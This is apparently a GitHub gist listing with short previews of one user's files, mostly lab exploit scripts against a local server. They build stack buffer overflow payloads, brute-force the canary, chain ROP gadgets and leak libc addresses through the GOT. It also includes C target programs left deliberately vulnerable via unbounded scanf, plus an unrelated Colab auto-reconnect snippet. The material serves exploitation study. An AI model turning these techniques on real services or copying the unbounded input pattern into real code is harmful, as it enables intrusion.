Shivam Shrirao ShivamShrirao
ShivamShrirao
/ exp_serv.py
Last active
June 8, 2020 20:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from struct import pack,unpack | |
| from threading import Thread | |
| from telnetlib import Telnet | |
| from time import sleep | |
| import socket | |
| import sys | |
| p64 = lambda x: pack("Q",x) # convert to little endian | |
| u64 = lambda x: unpack("Q",x)[0] # revert back from little endian |
ShivamShrirao
/ brute_address_part2.py
Last active
June 5, 2020 22:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pop_rdi = BIN_BASE + 0x001643 | |
| pop_rsi_r15 = BIN_BASE + 0x001641 | |
| ret_gad = BIN_BASE + 0x1306 | |
| write_plt = BIN_BASE + 0x1060 | |
| write_got = BIN_BASE + 0x4030 | |
| buf = b'A'*200 | |
| buf+= p64(CANARY) |
ShivamShrirao
/ brute_address.py
Last active
June 5, 2020 20:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from struct import pack,unpack | |
| from threading import Thread | |
| from telnetlib import Telnet | |
| from time import sleep | |
| import socket | |
| import sys | |
| p64 = lambda x: pack("Q",x) # convert to little endian | |
| u64 = lambda x: unpack("Q",x)[0] # revert back from little endian |
ShivamShrirao
/ partial_test.py
Last active
June 3, 2020 17:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import socket | |
| TRGT = ('192.168.0.6', 8888) # ip and port | |
| buf = b'A'*200 | |
| buf+= b'B' # overwrite canary's first byte with B | |
| s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # create TCP socket | |
| s.connect(TRGT) # connect to target |
ShivamShrirao
/ msg_server.c
Last active
June 5, 2020 22:42
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <signal.h> | |
| #include <string.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #include <arpa/inet.h> | |
| void handle_request(int cfd){ |
ShivamShrirao
/ colab_auto_reconnect.js
Last active
April 24, 2020 03:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // run in console | |
| function ReconnectColab(){ | |
| document.querySelector("#top-toolbar > colab-connect-button").shadowRoot.querySelector("#connect").click(); | |
| console.log("Reconnect clicked."); | |
| } | |
| setInterval(ReconnectColab,120000); |
ShivamShrirao
/ got_leak_system.py
Last active
April 15, 2020 00:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from struct import pack,unpack | |
| from telnetlib import Telnet | |
| import socket | |
| import sys | |
| TARGET = ("192.168.43.115",5555) # Target IP and PORT | |
| s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# Make a TCP socket |
ShivamShrirao
/ got_leak_part2.py
Created
April 14, 2020 00:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| leaks = resp.split(b"received.")[1] | |
| printf_libc = u64(leaks[:6].ljust(8,b'\x00')) # first 6 bytes are printf address. Pad with '\x00' to unpack. | |
| scanf_libc = u64(leaks[6:12].ljust(8,b'\x00')) # next 6 bytes are __isoc99_scanf address. Pad with '\x00' to unpack. | |
| print("[*] Leaked libc printf:\t\t",hex(printf_libc)) # Print in hex format. | |
| print("[*] Leaked libc __isoc99_scanf:\t",hex(scanf_libc)) |
ShivamShrirao
/ got_leak_part1.py
Last active
April 14, 2020 17:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from struct import pack,unpack | |
| from telnetlib import Telnet | |
| import socket | |
| import sys | |
| TARGET = ("192.168.43.115",5555) # Target IP and PORT | |
| s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# Make a TCP socket |
ShivamShrirao
/ got_leak_target.c
Last active
April 9, 2020 23:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| void getMessage() | |
| { | |
| char msg[200]; | |
| printf("Enter message: "); | |
| scanf("%s",msg); | |
| // do something. | |
| printf("The message has been received."); | |
| } |
NewerOlder